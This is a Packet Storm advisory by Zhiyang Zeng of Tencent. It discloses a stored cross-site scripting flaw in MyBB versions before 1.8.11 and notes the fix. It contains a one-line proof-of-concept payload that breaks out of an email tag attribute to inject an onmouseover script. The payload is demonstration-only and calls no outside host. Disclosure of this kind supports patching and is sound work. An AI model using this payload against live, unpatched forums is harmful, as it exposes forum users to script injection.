MyBB Cross Site Scripting

2017-04-11T00:00:00
ID PACKETSTORM:142087
Type packetstorm
Reporter Zhiyang Zeng
Modified 2017-04-11T00:00:00

Description

                                        
                                            `#################################  
  
Description:  
============  
  
product:MyBB  
Homepage:https://mybb.com/  
vulnerable version:<1.8.11  
Severity:High risk  
  
===============  
  
Proof of Concept:  
  
  
  
=============  
  
  
  
1.post a thread or reply any thread ,write:  
  
  
[email=2"onmouseover="alert(document.location)]hover me[/email]  
  
  
then when useras mouse hover it,XSS attack will occur!  
  
============  
  
Fixed:  
============  
  
This vulnerability was fixed in version 1.8.11  
  
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/  
  
=============  
  
  
Best regards,  
Zhiyang Zeng of Tencent security platform department  
  
  
  
`